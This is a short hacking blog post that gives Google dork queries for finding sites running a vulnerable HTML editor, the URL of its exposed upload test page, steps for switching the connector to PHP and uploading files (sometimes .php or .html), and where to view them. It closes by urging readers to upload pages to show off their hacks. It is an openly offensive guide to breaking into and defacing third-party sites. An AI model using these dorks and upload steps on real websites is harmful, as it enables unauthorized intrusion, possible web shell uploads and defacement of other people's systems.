Menu
 

Html editor File Upload vulnerability



Google Dork
: inurl:/HTMLEditor/editor/
or "inurl:/HTMLEditor/editor//filemanager/"
or "inurl:/HTMLEditor/editor//filemanager//connectors/"


Exploit : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html


Go here :


http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html

change connectors into PhP (Like FCKeditor) and upload Your file


supported files : .TXT and .JPG in some site you can upload .html and .php too


to view you file goto : http://website/PowerCMS%20folder/files/your file here
or http://website/patch//PowerCMS%20folder/files/your file here

Enjoy the vulnerability and upload you page to show others your hacks.

Post a Comment

Feel Free To Ask Your Query we Love To Answer

 
Top